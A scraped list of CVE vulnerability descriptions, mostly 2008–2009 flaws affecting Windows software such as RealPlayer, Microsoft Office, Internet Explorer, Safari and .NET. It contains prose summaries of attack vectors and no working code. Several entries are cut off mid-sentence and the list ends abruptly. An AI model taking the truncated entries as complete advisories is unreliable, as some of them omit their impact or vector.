RealPlayer 10.5 6.0.12.1040 through 6.0.12.1741, RealPlayer 11 11.0.0 through 11.0.4, RealPlayer Enterprise, Mac RealPlayer 10 and 10.1, Linux RealPlayer 10, and Helix Player 10.x allows remote attackers to execute arbitrary code via a crafted Internet Video Recording (IVR) file with a modified field that controls an unspecified structure length and triggers heap corruption, related to use of RealPlayer through a Windows Explorer plugin. [CVE-2009-0375] Buffer overflow in a DLL file in RealNetworks RealPlayer 10, RealPlayer 10.5 6.0.12.1040 through 6.0.12.1741, RealPlayer 11 11.0.0 through 11.0.4, RealPlayer Enterprise, Mac RealPlayer 10 and 10.1, Linux RealPlayer 10, and Helix Player 10.x allows remote attackers to execute arbitrary code via a crafted Internet Video Recording (IVR) file with a filename length field containing a large integer, which triggers overwrite of an arbitrary memory location with a 0x00 byte value, related to use of RealPlayer through a Windows Explorer plugin. [CVE-2009-0369] Microsoft Internet Explorer 7 allows remote attackers to trick a user into visiting an arbitrary URL via an onclick action that moves a crafted element to the current mouse position, related to a "Clickjacking" vulnerability. [CVE-2009-0321] Apple Safari 3.2.1 (aka AppVer 3.525.27.1) on Windows allows remote attackers to cause a denial of service (infinite loop or access violation) via a link to an http URI in which the authority (aka hostname) portion is either a (1) . (dot) or (2) .. (dot dot) sequence. [CVE-2009-0282] Integer overflow in Ralink Technology USB wireless adapter (RT73) 3.08 for Windows, and other wireless card drivers including rt2400, rt2500, rt2570, and rt61, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a Probe Request packet with a long SSID, possibly related to an integer signedness error. [CVE-2009-0238] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 [CVE-2009-0237] Cross-site scripting (XSS) vulnerability in cookieauth.dll in the HTML forms authentication component in Microsoft Forefront Threat Management Gateway, Medium Business Edition (TMG MBE) [CVE-2009-0227] Stack-based buffer overflow in the PowerPoint 4.2 conversion filter (PP4X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via a large number of structures in sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0226, and CVE-2009-1137. [CVE-2009-0226] Stack-based buffer overflow in the PowerPoint 4.2 conversion filter in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via a long string in sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0225] Microsoft Office PowerPoint 2002 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 95 native file format, leading to improper "array indexing" and memory corruption, aka "PP7 Memory Corruption Vulnerability." [CVE-2009-0224] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-0223] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0226, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0222] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to a "pointer overwrite" and memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0223, CVE-2009-0226, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0221] Integer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a PowerPoint file containing a crafted record type for "collaboration information for different slides" that contains a field that specifies a large number of records, which triggers an under-allocated buffer and a heap-based buffer overflow, aka "Integer Overflow Vulnerability." [CVE-2009-0220] Multiple stack-based buffer overflows in the PowerPoint 4.0 importer (PP4X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allow remote attackers to execute arbitrary code via crafted formatting data for paragraphs in a file that uses a PowerPoint 4.0 native file format, related to (1) an incorrect calculation from a record header, or (2) an interget that is used to specify the number of bytes to copy, aka "Legacy File Format Vulnerability." [CVE-2009-0208] Unspecified vulnerability in HP Virtual Rooms Client before 7.0.1, when running on Windows, allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2009-0199] Heap-based buffer overflow in the VMnc media codec in vmnc.dll in VMware Movie Decoder before 6.5.3 build 185404, VMware Workstation 6.5.x before 6.5.3 build 185404, VMware Player 2.5.x before 2.5.3 build 185404, and VMware ACE 2.5.x before 2.5.3 build 185404 on Windows might allow remote attackers to execute arbitrary code via a video file with crafted dimensions (aka framebuffer parameters). [CVE-2009-0162] Cross-site scripting (XSS) vulnerability in Safari before 3.2.3, and 4 Public Beta, on Apple Mac OS X 10.5 before 10.5.7 and Windows allows remote attackers to inject arbitrary web script or HTML via a crafted feed: URL. [CVE-2009-0137] Multiple unspecified vulnerabilities in Safari RSS in Apple Mac OS X 10.4.11 and 10.5.6, and Windows XP and Vista, allow remote attackers to execute arbitrary JavaScript in the local security zone via a crafted feed: URL, related to "input validation issues." [CVE-2009-0133] Buffer overflow in Microsoft HTML Help Workshop 4.74 and earlier allows context-dependent attackers to execute arbitrary code via a .hhp file with a long "Index file" field, possibly a related issue to CVE-2006-0564. [CVE-2009-0123] Unspecified vulnerability in Apple Safari on Mac OS X 10.5 and Windows allows remote attackers to read arbitrary files on a client machine via vectors related to the association of Safari with the (1) feed, (2) feeds, and (3) feedsearch URL types for RSS feeds. NOTE: as of 20090114, the only disclosure is a vague pre-advisory. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2009-0102] Microsoft Project 2000 SR1 and 2002 SP1, and Office Project 2003 SP3, does not properly handle memory allocation for Project files, which allows remote attackers to execute arbitrary code via a malformed file, aka "Project Memory Validation Vulnerability." [CVE-2009-0100] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 [CVE-2009-0099] The Electronic Messaging System Microsoft Data Base (EMSMDB32) provider in Microsoft Exchange 2000 Server SP3 and Exchange Server 2003 SP2, as used in Exchange System Attendant, allows remote attackers to cause a denial of service (application outage) via a malformed MAPI command, aka "Literal Processing Vulnerability." [CVE-2009-0098] Microsoft Exchange 2000 Server SP3, Exchange Server 2003 SP2, and Exchange Server 2007 SP1 do not properly interpret Transport Neutral Encapsulation (TNEF) properties, which allows remote attackers to execute arbitrary code via a crafted TNEF message, aka "Memory Corruption Vulnerability." [CVE-2009-0097] Microsoft Office Visio 2002 SP2 and 2003 SP3 does not properly validate memory allocation for Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Memory Corruption Vulnerability." [CVE-2009-0096] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 does not properly perform memory copy operations for object data, which allows remote attackers to execute arbitrary code via a crafted Visio document, aka "Memory Corruption Vulnerability." [CVE-2009-0095] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 does not properly validate object data in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Memory Validation Vulnerability." [CVE-2009-0091] Microsoft .NET Framework 2.0, 2.0 SP1, and 3.5 does not properly enforce a certain type-equality constraint in .NET verifiable code, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft .NET Framework Type Verification Vulnerability." [CVE-2009-0090] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, and 2.0 SP1 does not properly validate .NET verifiable code, which allows remote attackers to obtain unintended access to stack memory, and execute arbitrary code, via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft .NET Framework Pointer Verification Vulnerability." [CVE-2009-0088] The WordPerfect 6.x Converter (WPFT632.CNV, 1998.1.27.0) in Microsoft Office Word 2000 SP3 and Microsoft Office Converter Pack does not properly validate the length of an unspecified string, which allows remote attackers to execute arbitrary code via a crafted WordPerfect 6.x file, related to an unspecified counter and control structures on the stack, aka "Word 2000 WordPerfect 6.x Converter Stack Corruption Vulnerability." [CVE-2009-0084] Use-after-free vulnerability in DirectShow in Microsoft DirectX 8.1 and 9.0 allows remote attackers to execute arbitrary code via an MJPEG file or video stream with a malformed Huffman table, which triggers an exception that frees heap memory that is later accessed, aka "MJPEG Decompression Vulnerability." [CVE-2009-0080] The ThreadPool class in Windows Vista Gold and SP1, and Server 2008, does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by leveraging incorrect thread ACLs to access the resources of one of the processes, aka "Windows Thread Pool ACL Weakness Vulnerability." [CVE-2009-0077] The firewall engine in Microsoft Forefront Threat Management Gateway, Medium Business Edition (TMG MBE) [CVE-2009-0076] Microsoft Internet Explorer 7, when XHTML strict mode is used, allows remote attackers to execute arbitrary code via the zoom style directive in conjunction with unspecified other directives in a malformed Cascading Style Sheets (CSS) stylesheet in a crafted HTML document, aka "CSS Memory Corruption Vulnerability." [CVE-2009-0075] Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0072] Microsoft Internet Explorer 6.0 through 8.0 beta2 allows remote attackers to cause a denial of service (application crash) via an onload=screen[""] attribute value in a BODY element. [CVE-2009-0016] Apple iTunes before 8.1 on Windows allows remote attackers to cause a denial of service (infinite loop) via a Digital Audio Access Protocol (DAAP) message with a crafted Content-Length header. [CVE-2009-0008] Unspecified vulnerability in Apple QuickTime MPEG-2 Playback Component before 7.60.92.0 on Windows allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted MPEG-2 movie. [CVE-2008-7295] Microsoft Internet Explorer cannot properly restrict modifications to cookies established in HTTPS sessions, which allows man-in-the-middle attackers to overwrite or delete arbitrary cookies via a Set-Cookie header in an HTTP response, related to lack of the HTTP Strict Transport Security (HSTS) includeSubDomains feature, aka a "cookie forcing" issue. [CVE-2008-7292] Bugzilla 2.20.x before 2.20.5, 2.22.x before 2.22.3, and 3.0.x before 3.0.3 on Windows does not delete the temporary files associated with uploaded attachments, which allows local users to obtain sensitive information by reading these files, a different vulnerability than CVE-2011-2977. [CVE-2008-7217] Microsoft Office 2008 for Mac, when running on Macintosh systems that restrict Office access to administrators, does not enforce this restriction for user ID 502, which allows local users with that ID to bypass intended security policy and access Office programs, related to permissions and ownership for certain directories. [CVE-2008-7211] CreativeLabs es1371mp.sys 5.1.3612.0 WDM audio driver, as used in Ensoniq PCI 1371 sound cards and when running on Windows Vista, does not create a Functional Device Object (FDO) to prevent user-moade access to the Physical Device Object (PDO), which allows local users to gain SYSTEM privileges via a crafted IRP request that dereferences a NULL FsContext pointer. [CVE-2008-7194] Unspecified vulnerability in Fujitsu Interstage HTTP Server, as used in Interstage Application Server 5.0, 7.0, 7.0.1, and 8.0.0 for Windows, allows attackers to cause a denial of service via a crafted request. [CVE-2008-7106] The installation of Sophos PureMessage for Microsoft Exchange 3.0 before 3.0.2, when both anti-virus and anti-spam are supported, does not create or launch the associated scan engines when the system is under heavy load, which has unspecified impact, probably remote bypass of scanner protection or a denial of service (message loss or delay). [CVE-2008-7105] Sophos PureMessage for Microsoft Exchange 3.0 before 3.0.2 allows remote attackers to cause a denial of service (EdgeTransport.exe termination) via a TNEF-encoded message with a crafted rich text body that is not properly handled during conversion to plain text. NOTE: this might be related to CVE-2008-7104. [CVE-2008-7104] Sophos PureMessage Scanner service (PMScanner.exe) in PureMessage for Microsoft Exchange 3.0 before 3.0.2 allows remote attackers to cause a denial of service (message queue delay and incomplete spam rule update) via a crafted (1) RTF or (2) PDF file. [CVE-2008-7064] Directory traversal vulnerability in the get_lang function in global.php in Quicksilver Forums 1.4.2 and earlier, as used in QSF Portal before 1.4.5, when running on Windows, allows remote attackers to include and execute arbitrary local files via a "\" (backslash) in the lang parameter to index.php, which bypasses a protection mechanism that only checks for "/" (forward slash), as demonstrated by uploading and including PHP code in an avatar file. [CVE-2008-7037] The Sidebar gadget in ITN News Gadget (aka ITN Hub Gadget) 1.06 for Windows Vista, and possibly other versions before 1.23, allows remote web servers or man-in-the-middle attackers to execute arbitrary commands via script in a short_title response. [CVE-2008-6938] Pi3Web 2.0.3 before PL2, when installed on Windows as a desktop application and without using the Pi3Web/Conf/Intenet.pi3, allows remote attackers to cause a denial of service (crash or hang) and obtain the full pathname of the server via a request to a file in the ISAPI directory that is not an executable DLL, which triggers the crash when the DLL load fails, as demonstrated using Isapi\users.txt. [CVE-2008-6903] Sophos Anti-Virus for Windows before 7.6.3, Anti-Virus for Windows NT/9x before 4.7.18, Anti-Virus for OS X before 4.9.18, Anti-Virus for Linux before 6.4.5, Anti-Virus for UNIX before 7.0.5, Anti-Virus for Unix and Netware before 4.37.0, Sophos EM Library, and Sophos small business solutions, when CAB archive scanning is enabled, allows remote attackers to cause a denial of service (segmentation fault) via a "fuzzed" CAB archive file, as demonstrated by the OUSPG PROTOS GENOME test suite for Archive Formats. [CVE-2008-6820] The db2fmp process in IBM DB2 8 before FP17, 9.1 before FP5, and 9.5 before FP2 on Windows runs with "OS privilege," which has unknown impact and attack vectors, a different vulnerability than CVE-2008-3856. [CVE-2008-6561] Citrix Presentation Server Client for Windows before 10.200 does not clear "credential information" from process memory in unspecified circumstances, which might allow local users to gain privileges. [CVE-2008-6219] nsrexecd.exe in multiple EMC Networker products including EMC NetWorker Server, Storage Node, and Client 7.3.x and 7.4, 7.4.1, 7.4.2, Client and Storage Node for Open VMS 7.3.2 ECO6 and earlier, Module for Microsoft Exchange 5.1 and earlier, Module for Microsoft Applications 2.0 and earlier, Module for Meditech 2.0 and earlier, and PowerSnap 2.4 SP1 and earlier does not properly control the allocation of memory, which allows remote attackers to cause a denial of service (memory exhaustion) via multiple crafted RPC requests. [CVE-2008-6063] Microsoft Word 2007, when the "Save as PDF" add-on is enabled, places an absolute pathname in the Subject field during an "Email as PDF" operation, which allows remote attackers to obtain sensitive information such as the sender's account name and a Temporary Internet Files subdirectory name. [CVE-2008-5912] An unspecified function in the JavaScript implementation in Microsoft Internet Explorer creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-5821] Memory leak in WebKit.dll in WebKit, as used by Apple Safari 3.2 on Windows Vista SP1, allows remote attackers to cause a denial of service (memory consumption and browser crash) via a long ALINK attribute in a BODY element in an HTML document. [CVE-2008-5787] Directory traversal vulnerability in mod.php in Arab Portal 2.1 on Windows allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, in conjunction with a show action. [CVE-2008-5749] DISPUTED Argument injection vulnerability in Google Chrome 1.0.154.36 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. NOTE: a third party disputes this issue, stating that Chrome "will ask for user permission" and "cannot launch the applet even [if] you have given out the permission." [CVE-2008-5717] Cross-site scripting (XSS) vulnerability in Hitachi JP1/Integrated Management - Service Support 08-10 through 08-10-05, 08-11 through 08-11-03, and 08-50 through 08-50-03 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5715] Mozilla Firefox 3.0.5 on Windows Vista allows remote attackers to cause a denial of service (application crash) via JavaScript code with a long string value for the hash property (aka location.hash). NOTE: it was later reported that earlier versions are also affected, and that the impact is CPU consumption and application hang in unspecified circumstances perhaps involving other platforms. [CVE-2008-5556] DISPUTED ** The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not recognize attack patterns designed to operate against web pages that are encoded with utf-7, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting crafted utf-7 content. NOTE: the vendor reportedly disputes this issue, stating "Behaviour is by design." [CVE-2008-5555] Microsoft Internet Explorer 8.0 Beta 2 relies on the XDomainRequestAllowed HTTP header to authorize data exchange between domains, which allows remote attackers to bypass the product's XSS Filter protection mechanism, and conduct XSS and cross-domain attacks, by injecting this header after a CRLF sequence, related to "XDomainRequest Allowed Injection (XAI)." NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5554] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not properly handle some HTTP headers that appear after a CRLF sequence in a URI, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS or redirection attacks, as demonstrated by the (1) Location and (2) Set-Cookie HTTP headers. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5553] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 disables itself upon encountering a certain X-XSS-Protection HTTP header, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting this header after a CRLF sequence. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5552] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks via a CRLF sequence in conjunction with a crafted Content-Type header, as demonstrated by a header with a utf-7 charset value. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5551] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting data at two different positions within an HTML document, related to STYLE elements and the CSS expression property, aka a "double injection." [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet) [CVE-2008-5439] Unspecified vulnerability in the SQLPlus Windows GUI component in Oracle Database 10.2.0.4 allows remote authenticated users to affect confidentiality via unknown vectors. [CVE-2008-5428] Opera 9.51 on Windows XP does not properly handle (1) multipart/mixed e-mail messages with many MIME parts and possibly (2) e-mail messages with many "Content-type: message/rfc822 [CVE-2008-5424] The MimeOleClearDirtyTree function in InetComm.dll in Microsoft Outlook Express 6.00.2900.5512 does not properly handle (1) multipart/mixed e-mail messages with many MIME parts and possibly (2) e-mail messages with many "Content-type: message/rfc822 [CVE-2008-5423] Sun Sun Ray Server Software 3.x and 4.0 and Sun Ray Windows Connector 1.1 and 2.0 expose the LDAP password during a configuration step, which allows local users to discover the Sun Ray administration password, and obtain admin access to the Data Store and Administration GUI, via unspecified vectors related to the utconfig component of the Server Software and the uttscadm component of the Windows Connector. [CVE-2008-5416] Heap-based buffer overflow in Microsoft SQL Server 2000 SP4, 8.00.2050, 8.00.2039, and earlier [CVE-2008-5415] The LDBserver service in the server in CA ARCserve Backup 11.1 through 12.0 on Windows allows remote attackers to execute arbitrary code via a handle_t argument to an RPC endpoint in which the argument refers to an incompatible procedure. [CVE-2008-5412] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows has unknown impact and attack vectors related to JSPs. NOTE: this is probably a duplicate of CVE-2009-0438. [CVE-2008-5408] Buffer overflow in the data management protocol in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allows remote authenticated users to cause a denial of service (application crash) and possibly execute arbitrary code via unknown vectors. NOTE: this can be exploited by unauthenticated remote attackers by leveraging CVE-2008-5407. [CVE-2008-5407] Multiple unspecified vulnerabilities in the Backup Exec remote-agent logon process in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allow remote attackers to bypass authentication, and read or delete files, via unknown vectors. [CVE-2008-5326] The ClearQuest Maintenance Tool in IBM Rational ClearQuest 7.0.0 before 7.0.0.4 and 7.0.1 before 7.0.1.3 on Windows allows local users to obtain (1) user and (2) database passwords by using a password revealer utility on a field containing a series of asterisks. [CVE-2008-5315] Directory traversal vulnerability in the web interface in Apple iPhone Configuration Web Utility 1.0 on Windows allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2008-5181] Microsoft Communicator allows remote attackers to cause a denial of service (application or device outage) via instant messages containing large numbers of emoticons. [CVE-2008-5180] Microsoft Communicator, and Communicator in Microsoft Office 2010 beta, allows remote attackers to cause a denial of service (memory consumption) via a large number of SIP INVITE requests, which trigger the creation of many sessions. [CVE-2008-5178] Heap-based buffer overflow in Opera 9.62 on Windows allows remote attackers to execute arbitrary code via a long file:// URI. NOTE: this might overlap CVE-2008-5680. [CVE-2008-5100] The strong name (SN) implementation in Microsoft .NET Framework 2.0.50727 relies on the digital signature Public Key Token embedded in the pathname of a DLL file instead of the digital signature of this file itself, which makes it easier for attackers to bypass Global Assembly Cache (GAC) and Code Access Security (CAS) protection mechanisms, aka MSRC ticket MSRC8566gs. [CVE-2008-5038] Use-after-free vulnerability in the NetWare Core Protocol (NCP) feature in Novell eDirectory 8.7.3 SP10 before 8.7.3 SP10 FTF1 and 8.8 SP2 for Windows allows remote attackers to cause a denial of service and possibly execute arbitrary code via a sequence of "Get NCP Extension Information By Name" requests that cause one thread to operate on memory after it has been freed in another thread, which triggers memory corruption, aka Novell Bug 373852. [CVE-2008-5026] Microsoft SharePoint uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading HTML documents. [CVE-2008-4946] convirt 0.8.2 allows local users to overwrite arbitrary files via a symlink attack on the /tmp/set_output temporary file, related to the (1) _template_/provision.sh, (2) Linux_CD_Install/provision.sh, (3) Fedora_PV_Install/provision.sh, (4) CentOS_PV_Install/provision.sh, (5) common/provision.sh, (6) example/provision.sh, and (7) Windows_CD_Install/provision.sh scripts in image_store/. [CVE-2008-4922] Buffer overflow in the DjVu ActiveX Control 3.0 for Microsoft Office (DjVu_ActiveX_MSOffice.dll) allows remote attackers to execute arbitrary code via a long (1) ImageURL property, and possibly the (2) Mode, (3) Page, or (4) Zoom properties. [CVE-2008-4844] Use-after-free vulnerability in the CRecordInstance::TransferToDestination function in mshtml.dll in Microsoft Internet Explorer 5.01, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via DSO bindings involving (1) an XML Island, (2) XML DSOs, or (3) Tabular Data Control (TDC) in a crafted HTML or XML document, as demonstrated by nested SPAN or MARQUEE elements, and exploited in the wild in December 2008. [CVE-2008-4837] Stack-based buffer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4820] Unspecified vulnerability in the Flash Player ActiveX control in Adobe Flash Player 9.0.124.0 and earlier on Windows allows attackers to obtain sensitive information via unknown vectors. [CVE-2008-4816] Unspecified vulnerability in the Download Manager in Adobe Reader 8.1.2 and earlier on Windows allows remote attackers to change Internet Security options on a client machine via unknown vectors. [CVE-2008-4800] The DebugDiag ActiveX control in CrashHangExt.dll, possibly 1.0, in Microsoft Debug Diagnostic Tool allows remote attackers to cause a denial of service (NULL pointer dereference and Internet Explorer 6.0 crash) via a large negative integer argument to the GetEntryPointForThread method. NOTE: this issue might only be exploitable in limited environments or non-default browser settings. [CVE-2008-4788] Microsoft Internet Explorer 6 omits high-bit URL-encoded characters when displaying the address bar, which allows remote attackers to spoof the address bar via a URL with a domain name that differs from an important domain name only in these characters, as demonstrated by using exam%A9ple.com to spoof example.com, aka MSRC ticket MSRC7900. [CVE-2008-4787] Visual truncation vulnerability in Microsoft Internet Explorer 6 allows remote attackers to spoof the address bar via a URL with a hostname containing many &nbsp [CVE-2008-4582] Mozilla Firefox 3.0.1 through 3.0.3, Firefox 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13, when running on Windows, do not properly identify the context of Windows .url shortcut files, which allows user-assisted remote attackers to bypass the Same Origin Policy and obtain sensitive information via an HTML document that is directly accessible through a filesystem, as demonstrated by documents in (1) local folders, (2) Windows share folders, and (3) RAR archives, and as demonstrated by IFRAMEs referencing shortcuts that point to (a) about:cache?device=memory and (b) about:cache?device=disk, a variant of CVE-2008-2810. [CVE-2008-4562] Buffer overflow in the ovlaunch CGI program in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 on Windows allows remote attackers to execute arbitrary code via a crafted Host parameter. NOTE: this issue may be partially covered by CVE-2009-0205. [CVE-2008-4544] Unspecified vulnerability in an unspecified Microsoft API, as used by Cisco Unity and possibly other products, allows remote attackers to cause a denial of service by sending crafted packets to dynamic UDP ports, related to a "processing error." [CVE-2008-4540] Windows Mobile 6 on the HTC Hermes device makes WLAN passwords available to an auto-completion mechanism for the password input field, which allows physically proximate attackers to bypass password authentication and obtain WLAN access. [CVE-2008-4493] Microsoft PicturePusher ActiveX control (PipPPush.DLL 7.00.0709), as used in Microsoft Digital Image 2006 Starter Edition, allows remote attackers to force the upload of arbitrary files by using the AddString and Post methods and a modified PostURL to construct an HTTP POST request. NOTE: this issue might only be exploitable in limited environments or non-default browser settings. [CVE-2008-4473] Multiple heap-based buffer overflows in Adobe Flash CS3 Professional on Windows and Flash MX 2004 allow remote attackers to execute arbitrary code via an SWF file containing long control parameters. [CVE-2008-4450] Cross-site scripting (XSS) vulnerability in adodb.php in XAMPP for Windows 1.6.8 allows remote attackers to inject arbitrary web script or HTML via the (1) dbserver, (2) host, (3) user, (4) password, (5) database, and (6) table parameters. NOTE: the provenance of this information is unknown [CVE-2008-4411] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.15.210 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2008-1663. [CVE-2008-4381] Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (application crash) via Javascript that calls the alert function with a URL-encoded string of a large number of invalid characters. [CVE-2008-4324] The user interface event dispatcher in Mozilla Firefox 3.0.3 on Windows XP SP2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a series of keypress, click, onkeydown, onkeyup, onmousedown, and onmouseup events. NOTE: it was later reported that Firefox 3.0.2 on Mac OS X 10.5 is also affected. [CVE-2008-4301] * DISPUTED ** A certain ActiveX control in iisext.dll in Microsoft Internet Information Services (IIS) allows remote attackers to set a password via a string argument to the SetPassword method. NOTE: this issue could not be reproduced by a reliable third party. In addition, the original researcher is unreliable. Therefore the original disclosure is probably erroneous. [CVE-2008-4300] A certain ActiveX control in adsiis.dll in Microsoft Internet Information Services (IIS) allows remote attackers to cause a denial of service (browser crash) via a long string in the second argument to the GetObject method. NOTE: this issue was disclosed by an unreliable researcher, so it might be incorrect. [CVE-2008-4299] A certain ActiveX control in the Microsoft Internet Authentication Service (IAS) Helper COM Component in iashlpr.dll allows remote attackers to cause a denial of service (browser crash) via a large integer value in the first argument to the PutProperty method. NOTE: this issue was disclosed by an unreliable researcher, so it might be incorrect. [CVE-2008-4293] Unspecified vulnerability in Opera before 9.52 on Windows, when registered as a protocol handler, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors in which Opera is launched by other applications. [CVE-2008-4278] VMware VirtualCenter 2.5 before Update 3 build 119838 on Windows displays a user's password in cleartext when the password contains unspecified special characters, which allows physically proximate attackers to steal the password. [CVE-2008-4266] Array index vulnerability in Microsoft Office Excel 2000 SP3, 2002 SP3, and 2003 SP3 [CVE-2008-4265] Microsoft Office Excel 2000 SP3 allows remote attackers to execute arbitrary code via a crafted Excel spreadsheet that contains a malformed object, which triggers memory corruption during the loading of records from this spreadsheet, aka "File Format Parsing Vulnerability." [CVE-2008-4264] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4260] Microsoft Internet Explorer 7 sometimes attempts to access a deleted object, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2008-4259] Microsoft Internet Explorer 7 sometimes attempts to access uninitialized memory locations, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, related to a WebDAV request for a file with a long name, aka "HTML Objects Memory Corruption Vulnerability." [CVE-2008-4258] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 does not properly validate parameters during calls to navigation methods, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, aka "Parameter Validation Memory Corruption Vulnerability." [CVE-2008-4256] The Charts ActiveX control in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "Charts Control Memory Corruption Vulnerability." [CVE-2008-4254] Multiple integer overflows in the Hierarchical FlexGrid ActiveX control (mshflxgd.ocx) in Microsoft Visual Basic 6.0 and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 allow remote attackers to execute arbitrary code via crafted (1) Rows and (2) Cols properties to the (a) ExpandAll and (b) CollapseAll methods, related to access of incorrectly initialized objects and corruption of the "system state," aka "Hierarchical FlexGrid Control Memory Corruption Vulnerability." [CVE-2008-4253] The FlexGrid ActiveX control in Microsoft Visual Basic 6.0, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, Office FrontPage 2002 SP3, and Office Project 2003 SP3 does not properly handle 